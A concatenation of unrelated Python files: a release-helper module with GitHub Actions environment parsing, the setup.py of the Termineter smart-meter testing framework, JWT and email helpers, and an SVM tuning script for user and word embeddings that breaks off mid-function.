GITHUB_ACTIONS: bool | str | None = field(default=None, init=False)
"""
Always set to ``true`` when GitHub Actions is running the workflow.
You can use this variable to differentiate when tests are being run locally or by GitHub Actions.
"""
GITHUB_ACTOR: str | None = field(default=None, init=False)
"""
The name of the person or app that initiated the workflow.
For example, ``octocat``.
"""
GITHUB_API_URL: ParseResult | str | None = field(default=None, init=False)
"""
API URL.
For example: ``https://api.github.com``.
"""
GITHUB_BASE_REF: str | None = field(default=None, init=False)
"""
The name of the base ref or target branch of the pull request in a workflow run.
This is only set when the event that triggers a workflow run is either ``pull_request`` or ``pull_request_target``.
For example, ``main``.
"""
GITHUB_ENV: Path | str | None = field(default=None, init=False)
# noinspection LongLine
"""
The path on the runner to the file that sets environment variables from workflow commands.
This file is unique to the current step and changes for each step in a job.
For example, ``/home/runner/work/_temp/_runner_file_commands/set_env_87406d6e-4979-4d42-98e1-3dab1f48b13a``.
For more information, see `Workflow commands for GitHub Actions.
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/workflow-commands-for-github-actions#setting-an-environment-variable>`_
"""
GITHUB_EVENT_NAME: str | None = field(default=None, init=False)
"""
The name of the event that triggered the workflow.
For example, ``workflow_dispatch``.
"""
GITHUB_EVENT_PATH: Path | str | None = field(default=None, init=False)
"""
The path to the file on the runner that contains the full event webhook payload.
For example, ``/github/workflow/event.json``.
"""
GITHUB_GRAPHQL_URL: ParseResult | str | None = field(default=None, init=False)
"""
Returns the GraphQL API URL.
For example: ``https://api.github.com/graphql``.
"""
GITHUB_HEAD_REF: str | None = field(default=None, init=False)
"""
The head ref or source branch of the pull request in a workflow run.
This property is only set when the event that triggers a workflow run is either
``pull_request`` or ``pull_request_target``.
For example, ``feature-branch-1``.
"""
GITHUB_JOB: str | None = field(default=None, init=False)
# noinspection LongLine
"""
The `job_id
<https://docs.github.com/en/enterprise-cloud@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_id>`_
of the current job.
For example, ``greeting_job``.
"""
GITHUB_PATH: Path | str | None = field(default=None, init=False)
# noinspection LongLine
"""
The path on the runner to the file that sets system PATH variables from workflow commands.
This file is unique to the current step and changes for each step in a job.
For example, ``/home/runner/work/_temp/_runner_file_commands/add_path_899b9445-ad4a-400c-aa89-249f18632cf5``.
For more information, see
`Workflow commands for GitHub Actions.
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/workflow-commands-for-github-actions#adding-a-system-path>`_
"""
GITHUB_REF: str | None = field(default=None, init=False)
"""
The branch or tag ref that triggered the workflow run.
For branches this is the format ``refs/heads/<branch_name>``,
for tags it is ``refs/tags/<tag_name>``,
and for pull requests it is ``refs/pull/<pr_number>/merge``.
This variable is only set if a branch or tag is available for the event type.
For example, ``refs/heads/feature-branch-1``.
"""
GITHUB_REF_NAME: str | None = field(default=None, init=False)
"""
The branch or tag name that triggered the workflow run.
For example, ``feature-branch-1``.
"""
GITHUB_REF_PROTECTED: bool | str | None = field(default=None, init=False)
"""
``true`` if branch protections are configured for the ref that triggered the workflow run.
"""
GITHUB_REF_TYPE: str | None = field(default=None, init=False)
"""
The type of ref that triggered the workflow run.
Valid values are ``branch`` or ``tag``.
For example, ``branch``.
"""
GITHUB_REPOSITORY: str | None = field(default=None, init=False)
"""
The owner and repository name.
For example, ``octocat/Hello-World``.
"""
GITHUB_REPOSITORY_OWNER: str | None = field(default=None, init=False)
"""
The repository owner's name.
For example, ``octocat``.
"""
GITHUB_RETENTION_DAYS: str | None = field(default=None, init=False)
"""
The number of days that workflow run logs and artifacts are kept.
For example, ``90``.
"""
GITHUB_RUN_ATTEMPT: str | None = field(default=None, init=False)
"""
A unique number for each attempt of a particular workflow run in a repository.
This number begins at ``1`` for the workflow run's first attempt, and increments with each re-run.
For example, ``3``.
"""
GITHUB_RUN_ID: str | None = field(default=None, init=False)
"""
A unique number for each workflow run within a repository.
This number does not change if you re-run the workflow run.
For example, ``1658821493``.
"""
GITHUB_RUN_NUMBER: str | None = field(default=None, init=False)
"""
A unique number for each run of a particular workflow in a repository.
This number begins at ``1`` for the workflow's first run, and increments with each new run.
This number does not change if you re-run the workflow run.
For example, ``3``.
"""
GITHUB_SERVER_URL: ParseResult | str | None = field(default=None, init=False)
"""
The URL of the GitHub Enterprise Cloud server.
For example: ``https://github.com``.
"""
GITHUB_SHA: str | None = field(default=None, init=False)
"""
The commit SHA that triggered the workflow.
The value of this commit SHA depends on the event that triggered the workflow.
For more information, see `Events that trigger workflows.
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/events-that-trigger-workflows>`_
For example, ``ffac537e6cbbf934b08745a378932722df287a53``.
"""
GITHUB_WORKFLOW: Path | str | None = field(default=None, init=False)
"""
The name of the workflow.
For example, ``My test workflow``.
If the workflow file doesn't specify a name,
the value of this variable is the full path of the workflow file in the repository.
"""
GITHUB_WORKSPACE: Path | str | None = field(default=None, init=False)
"""
The default working directory on the runner for steps, and the default location of your repository
when using the `checkout <https://github.com/actions/checkout>`_ action.
For example, ``/home/runner/work/my-repo-name/my-repo-name``.
"""
RUNNER_ARCH: str | None = field(default=None, init=False)
"""
The architecture of the runner executing the job.
Possible values are ``X86``, ``X64``, ``ARM``, or ``ARM64``.
For example, ``X86``.
"""
RUNNER_NAME: str | None = field(default=None, init=False)
"""
The name of the runner executing the job.
For example, ``Hosted Agent``.
"""
RUNNER_OS: str | None = field(default=None, init=False)
"""
The operating system of the runner executing the job.
Possible values are ``Linux``, ``Windows``, or ``macOS``.
For example, ``Linux``.
"""
RUNNER_TEMP: Path | str | None = field(default=None, init=False)
"""
The path to a temporary directory on the runner.
This directory is emptied at the beginning and end of each job.
Note that files will not be removed if the runner's user account does not have permission to delete them.
For example, ``_temp``.
"""
RUNNER_TOOL_CACHE: str | None = field(default=None, init=False)
# noinspection LongLine
"""
The path to the directory containing preinstalled tools for GitHub-hosted runners.
For more information, see `About GitHub-hosted runners.
<https://docs.github.com/en/enterprise-cloud@latest/actions/reference/specifications-for-github-hosted-runners/#supported-software>`_
`Ubuntu latest <https://github.com/actions/virtual-environments/blob/main/images/linux/Ubuntu2004-Readme.md>`_
`macOS latest <https://github.com/actions/virtual-environments/blob/main/images/macos/macos-11-Readme.md>`_
For example, ``C:\hostedtoolcache\windows``.
"""
SUDO_USER: str | None = field(default=None, init=False)
HOME: str | None = field(default=None, init=False)
LC_TYPE: str | None = field(default=None, init=False)
PYTHONUNBUFFERED: str | None = field(default=None, init=False)
XPC_FLAGS: str | None = field(default=None, init=False)
SSH_AUTH_SOCK: str | None = field(default=None, init=False)
TMPDIR: str | None = field(default=None, init=False)
IPYTHONENABLE: str | None = field(default=None, init=False)
OLDPWD: str | None = field(default=None, init=False)
PYTHONIOENCODING: str | None = field(default=None, init=False)
SHELL: str | None = field(default=None, init=False)
PYTHONPATH: str | None = field(default=None, init=False)
PYCHARM_MATPLOTLIB_INTERACTIVE: str | None = field(default=None, init=False)
__CFBundleIdentifier: str | None = field(default=None, init=False)
__CF_USER_TEXT_ENCODING: str | None = field(default=None, init=False)
PYCHARM_DISPLAY_PORT: str | None = field(default=None, init=False)
PYCHARM_HOSTED: str | None = field(default=None, init=False)
PWD: str | None = field(default=None, init=False)
XPC_SERVICE_NAME: str | None = field(default=None, init=False)
PYCHARM_MATPLOTLIB_INDEX: str | None = field(default=None, init=False)
LOGNAME: str | None = field(default=None, init=False)
PYDEVD_LOAD_VALUES_ASYNC: str | None = field(default=None, init=False)
PYCHARM_PROPERTIES: str | None = field(default=None, init=False)
PS1: str | None = field(default=None, init=False)
COMMAND_MODE: str | None = field(default=None, init=False)
PYCHARM_VM_OPTIONS: str | None = field(default=None, init=False)
PATH: str | None = field(default=None, init=False)
_parse_as_int: ClassVar[tuple[str, ...]] = ("GITHUB_RUN_ATTEMPT", "GITHUB_RUN_ID", "GITHUB_RUN_NUMBER",)
_parse_as_int_suffix: ClassVar[tuple[str, ...]] = ("_GID", "_JOBS", "_PORT", "_UID",)
parsed: InitVar[bool] = True
def __post_init__(self, parsed: bool) -> None:
"""
Instance of Env class
Args:
parsed: Parse the environment variables using :func:`mreleaser.parse_str`,
except :func:`Env.as_int` (default: True)
"""
self.__dict__.update({k: self.as_int(k, v) for k, v in os.environ.items()} if parsed else os.environ)
def __contains__(self, item):
return item in self.__dict__
def __getattr__(self, name: str) -> str | None:
if name in self:
return self.__dict__[name]
return None
    def __getattribute__(self, name: str) -> str | None:
        # Fall back to None for missing attributes instead of raising; avoid
        # hasattr() here, which would re-enter __getattribute__ and recurse.
        try:
            return super().__getattribute__(name)
        except AttributeError:
            return None
def __getitem__(self, item: str) -> str | None:
return self.__getattr__(item)
@classmethod
def as_int(cls, key: str, value: str = "") -> bool | Path | ParseResult | IPv4Address | IPv6Address | int | str:
"""
        Parse the value as an int when the environment variable should be forced to int, checking whether:
- has value,
- key in :data:`Env._parse_as_int` or
- key ends with one of the items in :data:`Env._parse_as_int_suffix`.
        Args:
key: Environment variable name.
value: Environment variable value (default: "").
Returns:
int, if key should be parsed as int and has value, otherwise according to :func:`parse_str`.
"""
convert = False
if value:
if key in cls._parse_as_int:
convert = True
else:
for item in cls._parse_as_int_suffix:
if key.endswith(item):
convert = True
return int(value) if convert and value.isnumeric() else parse_str(value)
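# Editor-added illustration of Env.as_int() (a minimal sketch; the variable names
# below are examples only, not values read from the real environment):
def _env_as_int_example() -> None:
    assert Env.as_int("GITHUB_RUN_ID", "7") == 7   # listed in Env._parse_as_int
    assert Env.as_int("MAX_JOBS", "4") == 4        # matches the "_JOBS" suffix rule
    assert Env.as_int("FOO", "1") is True          # falls back to parse_str()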
@dataclass
class Git(git.Repo):
"""
Dataclass Wrapper for :class:`git.Repo`.
Represents a git repository and allows you to query references,
gather commit information, generate diffs, create and clone repositories query
the log.
'working_tree_dir' is the working tree directory, but will raise AssertionError if we are a bare repository.
"""
git: GitCmd = field(init=False)
"""
The Git class manages communication with the Git binary.
It provides a convenient interface to calling the Git binary, such as in::
g = Git( git_dir )
g.init() # calls 'git init' program
rval = g.ls_files() # calls 'git ls-files' program
``Debugging``
Set the GIT_PYTHON_TRACE environment variable print each invocation
of the command to stdout.
Set its value to 'full' to see details about the returned values.
"""
git_dir: AnyPath | None = field(default=None, init=False)
"""the .git repository directory, which is always set"""
odb: Type[LooseObjectDB] = field(init=False)
working_dir: AnyPath | None = field(default=None, init=False)
"""working directory of the git command, which is the working tree
directory if available or the .git directory in case of bare repositories"""
path: InitVar[AnyPath | None] = None
"""File or Directory inside the git repository, the default with search_parent_directories"""
expand_vars: InitVar[bool] = True
odbt: InitVar[Type[LooseObjectDB]] = GitCmdObjectDB
"""the path to either the root git directory or the bare git repo"""
search_parent_directories: InitVar[bool] = True
"""if True, all parent directories will be searched for a valid repo as well."""
def __post_init__(self, path: AnyPath | None, expand_vars: bool,
odbt: Type[LooseObjectDB], search_parent_directories: bool):
"""
Create a new Repo instance
Examples:
>>> assert Git(__file__)
>>> Git("~/repo.git") # doctest: +SKIP
>>> Git("${HOME}/repo") # doctest: +SKIP
Raises:
InvalidGitRepositoryError
NoSuchPathError
Args:
path: File or Directory inside the git repository, the default with search_parent_directories set to True
or the path to either the root git directory or the bare git repo
if search_parent_directories is changed to False
expand_vars: if True, environment variables will be expanded in the given path
search_parent_directories: Search all parent directories for a git repository.
Returns:
Git: Git instance
"""
super(Git, self).__init__(path if path is None else Path(path).directory(), expand_vars=expand_vars,
odbt=odbt, search_parent_directories=search_parent_directories)
@property
def top(self) -> Path:
"""Git Top Directory Path."""
path = Path(self.working_dir)
return Path(path.parent if ".git" in path else path)
@dataclass
class Releaser(git.Repo):
"""The :class:`git.Repo` object."""
path: Path = field(default_factory=Path)
git: Git = field(default_factory=Git, init=False)
class TempDir(tempfile.TemporaryDirectory):
"""
    Wrapper for :class:`tempfile.TemporaryDirectory` that returns a :class:`Path` from ``__enter__`` instead of a plain string.
"""
def __enter__(self) -> Path:
"""
Return the path of the temporary directory
Returns:
Path of the temporary directory
"""
return Path(self.name)
async def aiocmd(*args, **kwargs) -> CompletedProcess:
"""
Async Exec Command
Examples:
>>> with TempDir() as tmp:
... rv = asyncio.run(aiocmd("git", "clone", "https://github.com/octocat/Hello-World.git", cwd=tmp))
... assert rv.returncode == 0
... assert (tmp / "Hello-World" / "README").exists()
Args:
*args: command and args
**kwargs: subprocess.run kwargs
    Raises:
        CmdError
    Returns:
        CompletedProcess of the executed command
"""
proc = await asyncio.create_subprocess_exec(*args, stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE, **kwargs)
stdout, stderr = await proc.communicate()
completed = subprocess.CompletedProcess(args, returncode=proc.returncode,
stdout=stdout.decode() if stdout else None,
stderr=stderr.decode() if stderr else None)
if completed.returncode != 0:
raise CmdError(completed)
return completed
cli_invoke = CliRunner().invoke
def cmd(*args, **kwargs) -> CompletedProcess:
"""
Exec Command
Examples:
>>> with TempDir() as tmp:
... rv = cmd("git", "clone", "https://github.com/octocat/Hello-World.git", tmp)
... assert rv.returncode == 0
        ...     assert (tmp / "README").exists()
Args:
*args: command and args
**kwargs: subprocess.run kwargs
Raises:
CmdError
Returns:
        CompletedProcess of the executed command
"""
completed = subprocess.run(args, **kwargs, capture_output=True, text=True)
if completed.returncode != 0:
raise CmdError(completed)
return completed
def parse_env(name: str = "USER") -> bool | Path | ParseResult | IPv4Address | IPv6Address | int | str | None:
"""
Parses variable from environment using :func:`mreleaser.parse_str`,
except ``SUDO_UID`` or ``SUDO_GID`` which are parsed as int instead of bool.
Arguments:
name: variable name to parse from environment (default: USER)
Examples:
>>> assert isinstance(parse_env(), str)
>>>
>>> os.environ['FOO'] = '1'
>>> assert parse_env("FOO") is True
>>>
>>> os.environ['FOO'] = '0'
>>> assert parse_env("FOO") is False
>>>
>>> os.environ['FOO'] = 'TrUe'
>>> assert parse_env("FOO") is True
>>>
>>> os.environ['FOO'] = 'OFF'
>>> assert parse_env("FOO") is False
>>>
>>> os.environ['FOO'] = '~/foo'
>>> assert parse_env("FOO") == Path('~/foo')
>>>
>>> os.environ['FOO'] = '/foo'
>>> assert parse_env("FOO") == Path('/foo')
>>>
>>> os.environ['FOO'] = './foo'
>>> assert parse_env("FOO") == Path('./foo')
>>>
>>> os.environ['FOO'] = './foo'
>>> assert parse_env("FOO") == Path('./foo')
>>>
>>> v = "https://github.com"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO").geturl() == v
>>>
>>> v = "[email protected]"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO").geturl() == v
>>>
>>> v = "0.0.0.0"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO").exploded == v
>>>
>>> os.environ['FOO'] = "::1"
>>> assert parse_env("FOO").exploded.endswith(":0001")
>>>
>>> v = "2"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO") == int(v)
>>>
>>> v = "2.0"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO") == v
>>>
>>> del os.environ['FOO']
>>> assert parse_env("FOO") is None
>>>
>>> assert isinstance(parse_env("PATH"), str)
Returns:
        The parsed value of the environment variable, or None if the variable is not set.
"""
if value := os.environ.get(name):
return Env.as_int(name, value)
return value
def parse_str(data: Any | None = None) -> bool | Path | ParseResult | IPv4Address | IPv6Address | int | str | None:
"""
Parses str or data.__str__()
Parses:
- bool: 1, 0, True, False, yes, no, on, off (case insensitive)
- int: integer only numeric characters but 1 and 0
- ipaddress: ipv4/ipv6 address
- url: if "://" or "@" is found it will be parsed as url
        - path: "." itself, or values that start with "/", "~" or "." and do not contain ":"
- others as string
Arguments:
data: variable name to parse from environment (default: USER)
Examples:
>>> assert parse_str() is None
>>>
>>> assert parse_str("1") is True
>>> assert parse_str("0") is False
        >>> assert parse_str("TrUe") is True
>>> assert parse_str("OFF") is False
>>>
>>> assert parse_str("https://github.com").geturl() == "https://github.com"
>>> assert parse_str("[email protected]").geturl() == "[email protected]"
>>>
>>> assert parse_str("~/foo") == Path('~/foo')
>>> assert parse_str("/foo") == Path('/foo')
>>> assert parse_str("./foo") == Path('./foo')
        >>> assert parse_str(".") == Path('.')
>>> assert parse_str(Path()) == Path()
>>> assert isinstance(parse_str(Git()), Path)
>>>
>>> assert parse_str("0.0.0.0").exploded == "0.0.0.0"
>>> assert parse_str("::1").exploded.endswith(":0001")
>>>
>>> assert parse_str("2") == 2
>>> assert parse_str("2.0") == "2.0"
>>> assert parse_str("/usr/share/man:") == "/usr/share/man:"
>>> assert isinstance(parse_str(os.environ["PATH"]), str)
Returns:
        The parsed value, or None when ``data`` is None.
"""
if data is not None:
if not isinstance(data, str): data = str(data)
if data.lower() in ['1', 'true', 'yes', 'on']:
return True
elif data.lower() in ['0', 'false', 'no', 'off']:
return False
elif '://' in data or '@' in data:
return urllib.parse.urlparse(data)
        elif data == "." or (data and data[0] in ('/', '~', '.') and ":" not in data):
return Path(data)
else:
try:
return ipaddress.ip_address(data)
except ValueError:
if data.isnumeric():
return int(data)
return data
def suppress(func: Callable[P, T], *args: P.args, exception: ExcType | None = Exception, **kwargs: P.kwargs) -> T:
"""
    Try to suppress an exception raised while calling ``func``.
Args:
func: function to call
*args: args to pass to func
exception: exception to suppress (default: Exception)
**kwargs: kwargs to pass to func
Returns:
result of func
"""
with contextlib.suppress(exception or Exception):
return func(*args, **kwargs)
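# Editor-added illustration of suppress() (a minimal sketch, not part of the public API):
def _suppress_example() -> None:
    assert suppress(int, "42") == 42                         # no exception: the value is returned
    assert suppress(int, "x", exception=ValueError) is None  # ValueError swallowed -> None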
def version(package: str = __project__) -> str:
"""
Package installed version
Examples:
>>> from semver import VersionInfo
>>> assert VersionInfo.parse(version("pip"))
Arguments:
package: package name (Default: `PROJECT`)
    Returns:
Installed version
"""
return suppress(importlib.metadata.version, package or Path(__file__).parent.name,
exception=importlib.metadata.PackageNotFoundError)
@app.command(name="package")
def _package(path: Optional[list[Path]] = Argument('.', help='Directory Path to package'),) -> None:
"""
Prints the package name from setup.cfg in path.
\b
Returns:
None
"""
print(version())
@app.command(name="--version")
def _version() -> None:
"""
Prints the installed version of the package.
Returns:
None
"""
print(version())
if __name__ == "__main__":
from typer import Exit
try:
Exit(app())
except KeyboardInterrupt:
print('Aborted!')
Exit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
#
# setup.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
base_directory = os.path.dirname(__file__)
try:
from setuptools import setup, find_packages
except ImportError:
print('This project needs setuptools in order to build. Install it using your package')
print('manager (usually python-setuptools) or via pip (pip install setuptools).')
sys.exit(1)
try:
import pypandoc
long_description = pypandoc.convert(os.path.join(base_directory, 'README.md'), 'rst')
except (ImportError, OSError):
print('The pypandoc module is unavailable, can not generate the long description', file=sys.stderr)
long_description = None
DESCRIPTION = """\
Termineter is a Python framework which provides a platform for the security \
testing of smart meters.\
"""
setup(
name='termineter',
version='1.0.5',
author='Spencer McIntyre',
author_email='[email protected]',
maintainer='Spencer McIntyre',
description=DESCRIPTION,
long_description=long_description,
url='https://github.com/securestate/termineter',
license='BSD',
# these are duplicated in requirements.txt
install_requires=[
'crcelk>=1.0',
'pluginbase>=0.5',
'pyasn1>=0.1.7',
'pyserial>=2.6',
'smoke-zephyr>=1.2',
'tabulate>=0.8.1',
'termcolor>=1.1.0'
],
package_dir={'': 'lib'},
packages=find_packages('lib'),
package_data={
'': ['data/*'],
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Security'
],
scripts=['termineter']
)
|
import datetime
import hashlib
import jwt
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class HashFile(object):
def __init__(self, filename, blocksize = 65536):
file_hash = hashlib.sha256()
with open(filename, 'rb') as f:
fb = f.read(blocksize)
while len(fb) > 0:
file_hash.update(fb)
fb = f.read(blocksize)
self.digest = file_hash.hexdigest()
def getDigest(self):
return self.digest
class TokenManager(object):
def __init__(self, appkey, algorithm="HS256"):
self.key = appkey
self.algo = algorithm
def gen_token(self, ibmserial, week):
token = jwt.encode(
{
'ibmserial': ibmserial,
'week': week,
'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=48)
},
self.key, algorithm=self.algo)
return token
def verify_token(self, token):
try:
data = jwt.decode(token, self.key, algorithms=[self.algo])
if not data['ibmserial'] or not data['week']:
data = {'error': 'Invalid token, required fields missing'}
except Exception as e:
data = {'error': f'{str(e)}'}
return data
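# Editor-added illustration (a minimal sketch; the key and serial number below are
# placeholders, not values used by the real application):
def _token_manager_example():
    tm = TokenManager("example-app-key")
    token = tm.gen_token("0123456", 42)
    data = tm.verify_token(token)
    assert data.get("ibmserial") == "0123456" and data.get("week") == 42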
class Mailer(object):
def __init__(self, password, sender):
self.sender = sender
self.password = password
def send(self, receiver, mail_message):
message = MIMEMultipart("alternative")
message["Subject"] = "ILC CTE variance"
message["From"] = self.sender
message["To"] = receiver
part = MIMEText(mail_message, "html")
message.attach(part)
context = ssl.create_default_context()
try:
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login(self.sender, self.password)
server.sendmail(self.sender, receiver, message.as_string())
server.quit()
return True, 'Success'
except Exception as e:
return False, e
|
import sys
import os
import argparse
import numpy as np
import pandas as pd
from prettytable import PrettyTable
from multiprocessing import cpu_count
num_cores = cpu_count()
# model_types = ['w2v', 'swe', 'swe_with_randomwalk', 'swe_with_2nd_randomwalk', 'swe_with_bias_randomwalk', 'swe_with_deepwalk', 'swe_with_node2vec']
model_types = ['swe_with_bias_randomwalk']
factor_array = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
data_path = '../data'
embs_path = '../embs'
model_path = 'models'
result_path = 'results'
format_data_path = 'format_data'
begin_c = 0.015625
run_times = 10
def SVM_format(model_type, input_file, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
if model_type not in model_types:
print('Error: not support %s' % (model_type))
return ''
basename = ''
if input_file.find('head') != -1:
basename += 'head'
elif input_file.find('tail') != -1:
basename += 'tail'
if input_file.find('train') != -1:
basename += 'train'
elif input_file.find('test') != -1:
basename += 'test'
elif input_file.find('dev') != -1:
basename += 'dev'
basename += '_rd%d' % (yelp_round)
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
if model_type == 'w2v':
word_vec_file = os.path.join(
embs_path, '%s_word_vec_rd%d.txt' % (model_type, yelp_round))
format_file = os.path.join(
format_data_path, 'F_%s_%s.txt' % (model_type, basename))
if not os.path.isfile('./get_SVM_format_w2v'):
command = 'gcc get_SVM_format_w2v.c -o get_SVM_format_w2v -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_w2v -input %s -word-vec %s -output %s' % (
input_file, word_vec_file, format_file)
print(command)
os.system(command)
elif model_type == 'swe':
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s.txt' % (
model_type, yelp_round, lambda_str, r_str))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s.txt' % (
model_type, yelp_round, lambda_str, r_str))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s.txt' % (
model_type, basename, lambda_str, r_str))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s_ph%d_pl%d.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s_ph%d_pl%d.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s_ph%d_pl%d.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
elif model_type.startswith('swe_with_bias_randomwalk'):
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
return format_file
def tune_para_SVM(model_type, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
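    # Run liblinear's C-parameter search (-C) with 5-fold cross validation on
    # the formatted dev split, cache the search log in a C_*.txt file under
    # model_path, and return the path of that file.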
if model_type not in model_types:
        print('Error: unsupported model type %s' % (model_type))
return ''
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
